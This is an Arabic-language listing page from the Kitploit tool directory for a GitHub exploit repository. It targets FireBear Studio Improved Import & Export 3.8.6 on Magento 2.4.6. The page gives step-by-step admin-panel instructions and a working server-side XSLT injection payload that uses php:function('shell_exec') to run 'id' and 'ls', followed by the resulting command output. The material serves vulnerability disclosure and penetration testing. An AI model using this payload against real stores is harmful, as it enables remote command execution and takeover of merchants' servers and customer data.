Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Magento-ver.-2.4.6 — Magento الإصدار 2.4.6 - حقن XSLT من جانب الخادم | Kitploit
أدوات/GitHubGitHub/capture0x/magento-ver.-2.4.6
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبتطوير الحمولات
GitHubcapture0x/magento-ver.-2.4.6

Magento-ver.-2.4.6

Magento الإصدار 2.4.6 - حقن XSLT من جانب الخادم

عرض المستودع
4منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

عنوان الاستغلال: FireBear Studio Improved Import & Export ver. 3.8.6 لـ Magento 2.4.6 - حقن XSLT من جهة الخادم

  • التاريخ: 2023-11-17
  • مؤلف الاستغلال: tmrswrr
  • الصفحة الرئيسية للبائع: FireBear Studio
  • رابط البرنامج: FireBear Studio Improved Import & Export
  • الإصدار: FireBear Improved Import & Export ver. 3.8.6
صورة Magento صورة Magento ## إثبات المفهوم
  1. ادخل إلى هذا الرابط باستخدام بيانات اعتماد المدير: https://magento2demo.firebearstudio.com/

  2. انقر على SYSTEM > Import Jobs > Entity Type Widget > click edit

  3. اختر Import File Type > XML > Import Source is File

  4. ارفع أي ملف xml

  5. انقر على XSLT Configuration واكتب هذه الحمولة:

    root@kitploit:~
    <?xml version="1.0" encoding="utf-8"?>
    <xsl:stylesheet version="1.0"
    xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
    xmlns:php="http://php.net/xsl">
      <xsl:template match="/">
        <xsl:value-of select="php:function('shell_exec','id')" />
      </xsl:template>
    </xsl:stylesheet>```
    

** **uid=10095(a0563af8) gid=1050(a0563af8) groups=1050(a0563af8)

root@kitploit:~
   <?xml version="1.0" encoding="utf-8"?>
   <xsl:stylesheet version="1.0"
   xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
   xmlns:php="http://php.net/xsl">
     <xsl:template match="/">
       <xsl:value-of select="php:function('shell_exec','ls')" />
     </xsl:template>
   </xsl:stylesheet>```

**<?xml version="1.0"?>
cron.php
errors
get.php
health_check.php
index.php
media
opt
robots.txt
static
static.php
تنزيل الأداة